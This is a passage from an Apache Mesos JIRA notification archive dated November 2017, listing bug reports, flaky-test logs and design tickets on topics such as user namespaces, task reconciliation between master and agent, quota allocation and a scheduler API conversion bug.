[jira] [Created] (MESOS-8210) ReconciliationTest.RemovalInProgress is flaky.

2017-11-13 Thread Alexander Rukletsov (JIRA)
Alexander Rukletsov created MESOS-8210:
--

 Summary: ReconciliationTest.RemovalInProgress is flaky.
 Key: MESOS-8210
 URL: https://issues.apache.org/jira/browse/MESOS-8210
 Project: Mesos
  Issue Type: Bug
  Components: test
 Environment: Ubuntu 16.04
Reporter: Alexander Rukletsov
 Attachments: RemovalInProgress-badrun.txt

Observed it today on our internal CI:
{noformat}
/home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/reconciliation_tests.cpp:655
Mock function called more times than expected - taking default action specified 
at:
/home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/mock_registrar.cpp:54:
Function call: apply(16-byte object )
  Returns: 16-byte object <90-C5 04-00 D0-7F 00-00 F0-DB 05-00 D0-7F 
00-00>
 Expected: to be called once
   Actual: called twice - over-saturated and active
{noformat}
Full log attached.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8210) ReconciliationTest.RemovalInProgress is flaky.

2017-11-13 Thread Alexander Rukletsov (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8210?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Alexander Rukletsov updated MESOS-8210:
---
Attachment: RemovalInProgress-badrun.txt

> ReconciliationTest.RemovalInProgress is flaky.
> --
>
> Key: MESOS-8210
> URL: https://issues.apache.org/jira/browse/MESOS-8210
> Project: Mesos
>  Issue Type: Bug
>  Components: test
> Environment: Ubuntu 16.04
>Reporter: Alexander Rukletsov
>  Labels: flaky-test
> Attachments: RemovalInProgress-badrun.txt
>
>
> Observed it today on our internal CI:
> {noformat}
> /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/reconciliation_tests.cpp:655
> Mock function called more times than expected - taking default action 
> specified at:
> /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/mock_registrar.cpp:54:
> Function call: apply(16-byte object  D0-7F 00-00>)
>   Returns: 16-byte object <90-C5 04-00 D0-7F 00-00 F0-DB 05-00 D0-7F 
> 00-00>
>  Expected: to be called once
>Actual: called twice - over-saturated and active
> {noformat}
> Full log attached.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8211) Handle agent local resources in offer operation handler

2017-11-13 Thread Jan Schlicht (JIRA)
Jan Schlicht created MESOS-8211:
---

 Summary: Handle agent local resources in offer operation handler
 Key: MESOS-8211
 URL: https://issues.apache.org/jira/browse/MESOS-8211
 Project: Mesos
  Issue Type: Task
  Components: agent
Reporter: Jan Schlicht
Assignee: Jan Schlicht


The master will send {{ApplyOfferOperationMessage}} instead of 
{{CheckpointResourcesMessage}} when an agent has the 'RESOURCE_PROVIDER' 
capability set. The agent handler for the message needs to be updated to 
support operations on agent resources.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8139) Upgrade protobuf to 3.4.x.

2017-11-13 Thread Dmitry Zhuk (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8139?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16249555#comment-16249555
 ] 

Dmitry Zhuk commented on MESOS-8139:


https://reviews.apache.org/r/63752/
https://reviews.apache.org/r/63753/

> Upgrade protobuf to 3.4.x.
> --
>
> Key: MESOS-8139
> URL: https://issues.apache.org/jira/browse/MESOS-8139
> Project: Mesos
>  Issue Type: Task
>Reporter: Benjamin Mahler
>  Labels: performance
>
> The 3.4.x release includes move support:
> https://github.com/google/protobuf/releases/tag/v3.4.0
> This will provide some performance improvements for us, and will allow us to 
> start using move semantics for messages.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8212) SlaveRecoveryTest/0.RecoverTerminatedHTTPExecutor is flaky.

2017-11-13 Thread Alexander Rukletsov (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8212?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Alexander Rukletsov updated MESOS-8212:
---
Attachment: RecoverTerminatedHTTPExecutor-badrun2.txt

> SlaveRecoveryTest/0.RecoverTerminatedHTTPExecutor is flaky.
> ---
>
> Key: MESOS-8212
> URL: https://issues.apache.org/jira/browse/MESOS-8212
> Project: Mesos
>  Issue Type: Bug
>  Components: test
>Reporter: Alexander Rukletsov
>  Labels: flaky-test
> Attachments: RecoverTerminatedHTTPExecutor-badrun2.txt
>
>
> Observed in our internal CI:
> {noformat}
> ../../src/tests/slave_recovery_tests.cpp:1546: Failure
>   Expected: TASK_FAILED
> To be equal to: status->state()
>   Which is: TASK_RUNNING
> {noformat}
> Full log attached.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8212) SlaveRecoveryTest/0.RecoverTerminatedHTTPExecutor is flaky.

2017-11-13 Thread Alexander Rukletsov (JIRA)
Alexander Rukletsov created MESOS-8212:
--

 Summary: SlaveRecoveryTest/0.RecoverTerminatedHTTPExecutor is 
flaky.
 Key: MESOS-8212
 URL: https://issues.apache.org/jira/browse/MESOS-8212
 Project: Mesos
  Issue Type: Bug
  Components: test
Reporter: Alexander Rukletsov
 Attachments: RecoverTerminatedHTTPExecutor-badrun2.txt

Observed in our internal CI:
{noformat}
../../src/tests/slave_recovery_tests.cpp:1546: Failure
  Expected: TASK_FAILED
To be equal to: status->state()
  Which is: TASK_RUNNING
{noformat}
Full log attached.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8213) Private user namespaces for tasks

2017-11-13 Thread James Peach (JIRA)
James Peach created MESOS-8213:
--

 Summary: Private user namespaces for tasks
 Key: MESOS-8213
 URL: https://issues.apache.org/jira/browse/MESOS-8213
 Project: Mesos
  Issue Type: Improvement
  Components: containerization, security
Reporter: James Peach


Once MESOS-8142 implements generic user namespace support, we can improve 
security by adding another layer of user namespace that encapsulates just the 
final user task. This protects the kernel objects that are providing the 
containerization from the user task (since the private task namespace would no 
longer own the other namespaces).

This still would not alter the ID mapping of the user namespace.

This is a little tricky since we need to make the new namespace in the mess 
containerizer, so we need to take care of:

* when to chroot
* when to drop capabilities after entering the new namespace
* supporting command, default and custom executors (does the latter make sense?)



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8214) Run a task in the root user namespace

2017-11-13 Thread James Peach (JIRA)
James Peach created MESOS-8214:
--

 Summary: Run a task in the root user namespace
 Key: MESOS-8214
 URL: https://issues.apache.org/jira/browse/MESOS-8214
 Project: Mesos
  Issue Type: Improvement
  Components: containerization, security
Reporter: James Peach


When the {{namespaces/user}} isolator is applied, we need a way for schedulers 
to be able to specify a task to run in the root user namespace since it might 
need to have real host privilege. This mechanism should be plumbed through the 
authorization system so the authorizer gets a chance to veto the scheduler.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8214) Run a task in the root user namespace

2017-11-13 Thread James Peach (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8214?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

James Peach reassigned MESOS-8214:
--

Assignee: James Peach

> Run a task in the root user namespace
> -
>
> Key: MESOS-8214
> URL: https://issues.apache.org/jira/browse/MESOS-8214
> Project: Mesos
>  Issue Type: Improvement
>  Components: containerization, security
>Reporter: James Peach
>Assignee: James Peach
>
> When the {{namespaces/user}} isolator is applied, we need a way for 
> schedulers to be able to specify a task to run in the root user namespace 
> since it might need to have real host privilege. This mechanism should be 
> plumbed through the authorization system so the authorizer gets a chance to 
> veto the scheduler.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8213) Private user namespaces for tasks

2017-11-13 Thread James Peach (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8213?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

James Peach reassigned MESOS-8213:
--

Assignee: James Peach

> Private user namespaces for tasks
> -
>
> Key: MESOS-8213
> URL: https://issues.apache.org/jira/browse/MESOS-8213
> Project: Mesos
>  Issue Type: Improvement
>  Components: containerization, security
>Reporter: James Peach
>Assignee: James Peach
>
> Once MESOS-8142 implements generic user namespace support, we can improve 
> security by adding another layer of user namespace that encapsulates just the 
> final user task. This protects the kernel objects that are providing the 
> containerization from the user task (since the private task namespace would 
> no longer own the other namespaces).
> This still would not alter the ID mapping of the user namespace.
> This is a little tricky since we need to make the new namespace in the mess 
> containerizer, so we need to take care of:
> * when to chroot
> * when to drop capabilities after entering the new namespace
> * supporting command, default and custom executors (does the latter make 
> sense?)



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8215) Rename Queue::get to be more descriptive

2017-11-13 Thread James Peach (JIRA)
James Peach created MESOS-8215:
--

 Summary: Rename Queue::get to be more descriptive
 Key: MESOS-8215
 URL: https://issues.apache.org/jira/browse/MESOS-8215
 Project: Mesos
  Issue Type: Improvement
  Components: libprocess
Reporter: James Peach


The {{Queue::get}} member is quite misleadingly named. When you see 
{{foo.get()}}, this strongly suggests to the reader that `foo` is some sort of 
{{Option}}, since that is the most common pattern in {{libprocess}}.

We should call this operation {{pop}}, to indicate that is is a destructive 
retrieval of a the first queue element.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8185) Tasks can be known to the agent but unknown to the master.

2017-11-13 Thread Ilya Pronin (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8185?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16249889#comment-16249889
 ] 

Ilya Pronin commented on MESOS-8185:


[~bmahler] I see you've already changed it.

Thanks! Sure, let's discuss all available options. I suggested killing, because 
current contract between master and not {{PARTITION_AWARE}} frameworks is that 
{{LOST}} tasks will be killed by master.

> Tasks can be known to the agent but unknown to the master.
> --
>
> Key: MESOS-8185
> URL: https://issues.apache.org/jira/browse/MESOS-8185
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0
>Reporter: Ilya Pronin
>
> Currently, when a master re-registers an agent that was marked unreachable, 
> it shutdowns all not partition-aware frameworks on that agent. When a master 
> re-registers an agent that is already registered, it doesn't check that all 
> tasks from the slave's re-registration message are known to it.
> It is possible that due to a transient loss of connectivity an agent may miss 
> {{SlaveReregisteredMessage}} along with {{ShutdownFrameworkMessage}} and thus 
> will not kill not partition-aware tasks. But the master will mark the agent 
> as registered and will not re-add tasks that it thought will be killed. The 
> agent may re-register again, this time successfully, before becoming marked 
> unreachable while never having terminated tasks of not partition-aware 
> frameworks. The master will simply forget those tasks ever existed, because 
> it has "removed" them during the previous re-registration.
> Example scenario:
> # Connection from the master to the agent stops working
> # Agent doesn't see pings from the master and attempts to re-register
> # Master sends {{SlaveRegisteredMessage}} and {{ShutdownSlaveMessage}}, which 
> don't get to the agent because of the connection failure. Agent is marked 
> registered.
> # Network issue resolves, connection breaks. Agent retries re-registration.
> # Master thinks that the agent was registered since step (3) and just 
> re-sends {{SlaveRegisteredMessage}}. Tasks remain running on the agent.
> One of the possible solutions would be to compare the list of tasks the the 
> already registered agent reports in {{ReregisterSlaveMessage}} and the list 
> of tasks the master has. In this case anything that the master doesn't know 
> about should not exist on the agent.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Comment Edited] (MESOS-8185) Tasks can be known to the agent but unknown to the master.

2017-11-13 Thread Ilya Pronin (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8185?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16249889#comment-16249889
 ] 

Ilya Pronin edited comment on MESOS-8185 at 11/13/17 6:00 PM:
--

[~bmahler] I see you've already changed it. Thanks!

Sure, let's discuss all available options. I suggested killing, because current 
contract between master and not {{PARTITION_AWARE}} frameworks is that {{LOST}} 
tasks will be killed by master.


was (Author: ipronin):
[~bmahler] I see you've already changed it.

Thanks! Sure, let's discuss all available options. I suggested killing, because 
current contract between master and not {{PARTITION_AWARE}} frameworks is that 
{{LOST}} tasks will be killed by master.

> Tasks can be known to the agent but unknown to the master.
> --
>
> Key: MESOS-8185
> URL: https://issues.apache.org/jira/browse/MESOS-8185
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0
>Reporter: Ilya Pronin
>
> Currently, when a master re-registers an agent that was marked unreachable, 
> it shutdowns all not partition-aware frameworks on that agent. When a master 
> re-registers an agent that is already registered, it doesn't check that all 
> tasks from the slave's re-registration message are known to it.
> It is possible that due to a transient loss of connectivity an agent may miss 
> {{SlaveReregisteredMessage}} along with {{ShutdownFrameworkMessage}} and thus 
> will not kill not partition-aware tasks. But the master will mark the agent 
> as registered and will not re-add tasks that it thought will be killed. The 
> agent may re-register again, this time successfully, before becoming marked 
> unreachable while never having terminated tasks of not partition-aware 
> frameworks. The master will simply forget those tasks ever existed, because 
> it has "removed" them during the previous re-registration.
> Example scenario:
> # Connection from the master to the agent stops working
> # Agent doesn't see pings from the master and attempts to re-register
> # Master sends {{SlaveRegisteredMessage}} and {{ShutdownSlaveMessage}}, which 
> don't get to the agent because of the connection failure. Agent is marked 
> registered.
> # Network issue resolves, connection breaks. Agent retries re-registration.
> # Master thinks that the agent was registered since step (3) and just 
> re-sends {{SlaveRegisteredMessage}}. Tasks remain running on the agent.
> One of the possible solutions would be to compare the list of tasks the the 
> already registered agent reports in {{ReregisterSlaveMessage}} and the list 
> of tasks the master has. In this case anything that the master doesn't know 
> about should not exist on the agent.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8185) Tasks can be known to the agent but unknown to the master.

2017-11-13 Thread Ilya Pronin (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8185?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ilya Pronin reassigned MESOS-8185:
--

Assignee: Ilya Pronin

> Tasks can be known to the agent but unknown to the master.
> --
>
> Key: MESOS-8185
> URL: https://issues.apache.org/jira/browse/MESOS-8185
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0
>Reporter: Ilya Pronin
>Assignee: Ilya Pronin
>
> Currently, when a master re-registers an agent that was marked unreachable, 
> it shutdowns all not partition-aware frameworks on that agent. When a master 
> re-registers an agent that is already registered, it doesn't check that all 
> tasks from the slave's re-registration message are known to it.
> It is possible that due to a transient loss of connectivity an agent may miss 
> {{SlaveReregisteredMessage}} along with {{ShutdownFrameworkMessage}} and thus 
> will not kill not partition-aware tasks. But the master will mark the agent 
> as registered and will not re-add tasks that it thought will be killed. The 
> agent may re-register again, this time successfully, before becoming marked 
> unreachable while never having terminated tasks of not partition-aware 
> frameworks. The master will simply forget those tasks ever existed, because 
> it has "removed" them during the previous re-registration.
> Example scenario:
> # Connection from the master to the agent stops working
> # Agent doesn't see pings from the master and attempts to re-register
> # Master sends {{SlaveRegisteredMessage}} and {{ShutdownSlaveMessage}}, which 
> don't get to the agent because of the connection failure. Agent is marked 
> registered.
> # Network issue resolves, connection breaks. Agent retries re-registration.
> # Master thinks that the agent was registered since step (3) and just 
> re-sends {{SlaveRegisteredMessage}}. Tasks remain running on the agent.
> One of the possible solutions would be to compare the list of tasks the the 
> already registered agent reports in {{ReregisterSlaveMessage}} and the list 
> of tasks the master has. In this case anything that the master doesn't know 
> about should not exist on the agent.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-7790) Design hierarchical quota allocation.

2017-11-13 Thread Michael Park (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7790?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250121#comment-16250121
 ] 

Michael Park commented on MESOS-7790:
-

https://docs.google.com/document/d/1EEpHIlJahYtjqv7zAEkW8U7Bi0CTYFDqAhU0laM7Rzk

> Design hierarchical quota allocation.
> -
>
> Key: MESOS-7790
> URL: https://issues.apache.org/jira/browse/MESOS-7790
> Project: Mesos
>  Issue Type: Task
>  Components: allocation
>Reporter: Benjamin Mahler
>Assignee: Michael Park
>  Labels: multitenancy
>
> When quota is assigned in the role hierarchy (see MESOS-6375), it's possible 
> for there to be "undelegated" quota for a role. For example:
> {noformat}
> ^
>   /   \
> /   \
>eng (90 cpus)   sales (10 cpus)
>  ^
>/   \
>  /   \
>  ads (50 cpus)   build (10 cpus)
> {noformat}
> Here, the "eng" role has 60 of its 90 cpus of quota delegated to its 
> children, and 30 cpus remain undelegated. We need to design how to allocate 
> these 30 cpus undelegated cpus. Are they allocated entirely to the "eng" 
> role? Are they allocated to the "eng" role tree? If so, how do we determine 
> how much is allocated to each role in the "eng" tree (i.e. "eng", "eng/ads", 
> "eng/build").



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8185) Tasks can be known to the agent but unknown to the master.

2017-11-13 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8185?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8185:
---
Labels: reliability  (was: )

> Tasks can be known to the agent but unknown to the master.
> --
>
> Key: MESOS-8185
> URL: https://issues.apache.org/jira/browse/MESOS-8185
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0
>Reporter: Ilya Pronin
>Assignee: Ilya Pronin
>  Labels: reliability
>
> Currently, when a master re-registers an agent that was marked unreachable, 
> it shutdowns all not partition-aware frameworks on that agent. When a master 
> re-registers an agent that is already registered, it doesn't check that all 
> tasks from the slave's re-registration message are known to it.
> It is possible that due to a transient loss of connectivity an agent may miss 
> {{SlaveReregisteredMessage}} along with {{ShutdownFrameworkMessage}} and thus 
> will not kill not partition-aware tasks. But the master will mark the agent 
> as registered and will not re-add tasks that it thought will be killed. The 
> agent may re-register again, this time successfully, before becoming marked 
> unreachable while never having terminated tasks of not partition-aware 
> frameworks. The master will simply forget those tasks ever existed, because 
> it has "removed" them during the previous re-registration.
> Example scenario:
> # Connection from the master to the agent stops working
> # Agent doesn't see pings from the master and attempts to re-register
> # Master sends {{SlaveRegisteredMessage}} and {{ShutdownSlaveMessage}}, which 
> don't get to the agent because of the connection failure. Agent is marked 
> registered.
> # Network issue resolves, connection breaks. Agent retries re-registration.
> # Master thinks that the agent was registered since step (3) and just 
> re-sends {{SlaveRegisteredMessage}}. Tasks remain running on the agent.
> One of the possible solutions would be to compare the list of tasks the the 
> already registered agent reports in {{ReregisterSlaveMessage}} and the list 
> of tasks the master has. In this case anything that the master doesn't know 
> about should not exist on the agent.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8142) Improve container security with user namespaces

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8142?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-8142:
--
Issue Type: Improvement  (was: Bug)

> Improve container security with user namespaces
> ---
>
> Key: MESOS-8142
> URL: https://issues.apache.org/jira/browse/MESOS-8142
> Project: Mesos
>  Issue Type: Improvement
>  Components: containerization, security
>Reporter: James Peach
>Assignee: James Peach
>
> As a first pass at supporting user namespaces, figure out how we can use them 
> to improve container security when running untrusted tasks.
> This ticket is specifically targeting how to build a user namespace hierarchy 
> and excluding any sort of ID mapping for the container images.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8185) Tasks can be known to the agent but unknown to the master.

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8185?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-8185:
--
Sprint: Mesosphere Sprint 68

> Tasks can be known to the agent but unknown to the master.
> --
>
> Key: MESOS-8185
> URL: https://issues.apache.org/jira/browse/MESOS-8185
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0
>Reporter: Ilya Pronin
>Assignee: Ilya Pronin
>  Labels: reliability
>
> Currently, when a master re-registers an agent that was marked unreachable, 
> it shutdowns all not partition-aware frameworks on that agent. When a master 
> re-registers an agent that is already registered, it doesn't check that all 
> tasks from the slave's re-registration message are known to it.
> It is possible that due to a transient loss of connectivity an agent may miss 
> {{SlaveReregisteredMessage}} along with {{ShutdownFrameworkMessage}} and thus 
> will not kill not partition-aware tasks. But the master will mark the agent 
> as registered and will not re-add tasks that it thought will be killed. The 
> agent may re-register again, this time successfully, before becoming marked 
> unreachable while never having terminated tasks of not partition-aware 
> frameworks. The master will simply forget those tasks ever existed, because 
> it has "removed" them during the previous re-registration.
> Example scenario:
> # Connection from the master to the agent stops working
> # Agent doesn't see pings from the master and attempts to re-register
> # Master sends {{SlaveRegisteredMessage}} and {{ShutdownSlaveMessage}}, which 
> don't get to the agent because of the connection failure. Agent is marked 
> registered.
> # Network issue resolves, connection breaks. Agent retries re-registration.
> # Master thinks that the agent was registered since step (3) and just 
> re-sends {{SlaveRegisteredMessage}}. Tasks remain running on the agent.
> One of the possible solutions would be to compare the list of tasks the the 
> already registered agent reports in {{ReregisterSlaveMessage}} and the list 
> of tasks the master has. In this case anything that the master doesn't know 
> about should not exist on the agent.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8115) Add a master flag to disallow agents that are not configured with fault domain

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8115?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-8115:
--
Issue Type: Improvement  (was: Bug)

> Add a master flag to disallow agents that are not configured with fault domain
> --
>
> Key: MESOS-8115
> URL: https://issues.apache.org/jira/browse/MESOS-8115
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Vinod Kone
>Assignee: Vinod Kone
>
> Once mesos masters and agents in a cluster are *all* upgraded to a version 
> where the fault domains feature is available, it is beneficial to enforce 
> that agents without a fault domain configured are not allowed to join the 
> cluster. 
> This is a safety net for operators who could forget to configure the fault 
> domain of a remote agent and let it join the cluster. If this happens, an 
> agent in a remote region will be considered a local agent by the master and 
> frameworks (because agent's fault domain is not configured) causing tasks to 
> potentially land in a remote agent which is undesirable.
> Note that this has to be a configurable flag and not enforced by default 
> because otherwise upgrades from a fault domain non-configured cluster to a 
> configured cluster will not be possible.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8209) mesos master should revoke offers when executor state changes

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8209?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-8209:
-

Assignee: Vinod Kone

> mesos master should revoke offers when executor state changes
> -
>
> Key: MESOS-8209
> URL: https://issues.apache.org/jira/browse/MESOS-8209
> Project: Mesos
>  Issue Type: Bug
>Reporter: Jack Crawford
>Assignee: Vinod Kone
>
> Currently, the mesos master does not revoke offers when the number of 
> executors on an agent decreases. This is a problem under certain conditions, 
> such when running a workflow that starts lots of small tasks on agents, with 
> a one executor per task model, a master that does not revoke resources after 
> a set amount of time, and a scheduler that does not reject resources.
> The problem is that when running a mono-scheduler framework (which you might 
> want to do to easily enforce authentication requirements, have a full view of 
> all scheduled tasks, etc), in order to respond instantly when new tasks come 
> in I have the scheduler simply hang on to all resource offers it receives, 
> and the master is set to never revoke offers. This way the scheduler always 
> has a pool of resources to quickly service new requests as they come in.
> However, if you start tasks fast enough, the agents can fill up with 
> executors, making it appear as there are no resources available for the 
> scheduler to use. Ive seen this on r4.4xlarge machines on aws with executors 
> that consume 0.1 cpus, 32mb mem where the entire machine will be appear to be 
> filled with executors according to the master resource offers. The executors 
> are exiting (just after the task finishes), but the resources are not 
> reclaimed because the master does not revoke the outstanding resource offers 
> to reflect the change.
> You can replicate this pretty easily if you schedule tasks that finish 
> instantly with a 1-1 executor to task ratio. I find that if I schedule ~1000 
> tasks this way on a single r4.4xlarge machine, usually 600-700 will finish 
> before all the resource offers to the scheduler fill up and the agent appears 
> to be "full" of executors.
> Changing the scheduler/master to periodically reject/revoke resources fixes 
> the problem.
> My suggestion is for the master to revoke and reissue resource offers when 
> the executor count changes on an agent.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8200) Suppressed roles are not honoured for v1 scheduler subscribe requests.

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8200?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-8200:
--
Priority: Critical  (was: Major)

> Suppressed roles are not honoured for v1 scheduler subscribe requests.
> --
>
> Key: MESOS-8200
> URL: https://issues.apache.org/jira/browse/MESOS-8200
> Project: Mesos
>  Issue Type: Bug
>  Components: scheduler api, scheduler driver
>Reporter: Alexander Rukletsov
>Assignee: Yan Xu
>Priority: Critical
>
> When triaging MESOS-7996 I've found out that 
> {{Call.subscribe.suppressed_roles}} field is empty when the master processes 
> the request from a v1 HTTP scheduler. More precisely, [this 
> conversion|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/src/master/http.cpp#L969]
>  wipes the field. This is likely because this conversion relies on a general 
> [protobuf conversion 
> utility|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/src/internal/devolve.cpp#L28-L50],
>  which fails to copy {{suppressed_roles}} because they have different tags, 
> compare 
> [v0|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/include/mesos/scheduler/scheduler.proto#L271]
>  and 
> [v1|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/include/mesos/v1/scheduler/scheduler.proto#L258].



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8200) Suppressed roles are not honoured for v1 scheduler subscribe requests.

2017-11-13 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8200?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250149#comment-16250149
 ] 

Vinod Kone commented on MESOS-8200:
---

[~xujyan] Are you working on this? Seems pretty critical given the feature 
doesn't work.

> Suppressed roles are not honoured for v1 scheduler subscribe requests.
> --
>
> Key: MESOS-8200
> URL: https://issues.apache.org/jira/browse/MESOS-8200
> Project: Mesos
>  Issue Type: Bug
>  Components: scheduler api, scheduler driver
>Reporter: Alexander Rukletsov
>Assignee: Yan Xu
>Priority: Critical
>
> When triaging MESOS-7996 I've found out that 
> {{Call.subscribe.suppressed_roles}} field is empty when the master processes 
> the request from a v1 HTTP scheduler. More precisely, [this 
> conversion|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/src/master/http.cpp#L969]
>  wipes the field. This is likely because this conversion relies on a general 
> [protobuf conversion 
> utility|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/src/internal/devolve.cpp#L28-L50],
>  which fails to copy {{suppressed_roles}} because they have different tags, 
> compare 
> [v0|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/include/mesos/scheduler/scheduler.proto#L271]
>  and 
> [v1|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/include/mesos/v1/scheduler/scheduler.proto#L258].



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8159) ns::clone uses an async signal unsafe stack

2017-11-13 Thread Jie Yu (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8159?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jie Yu updated MESOS-8159:
--
Priority: Critical  (was: Trivial)

> ns::clone uses an async signal unsafe stack
> ---
>
> Key: MESOS-8159
> URL: https://issues.apache.org/jira/browse/MESOS-8159
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
>Reporter: James Peach
>Assignee: James Peach
>Priority: Critical
>
> In {{ns::clone}}, the first child call {{os::clone}} without passing a 
> parameter for the stack. This causes {{os::clone}} to implicitly {{malloc}} a 
> stack, which is not async-signal-safe.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8159) ns::clone uses an async signal unsafe stack

2017-11-13 Thread Jie Yu (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8159?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jie Yu updated MESOS-8159:
--
Fix Version/s: 1.4.1

> ns::clone uses an async signal unsafe stack
> ---
>
> Key: MESOS-8159
> URL: https://issues.apache.org/jira/browse/MESOS-8159
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
>Reporter: James Peach
>Assignee: James Peach
>Priority: Critical
> Fix For: 1.4.1
>
>
> In {{ns::clone}}, the first child call {{os::clone}} without passing a 
> parameter for the stack. This causes {{os::clone}} to implicitly {{malloc}} a 
> stack, which is not async-signal-safe.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8159) ns::clone uses an async signal unsafe stack

2017-11-13 Thread Vinod Kone (JIRA)

[ 
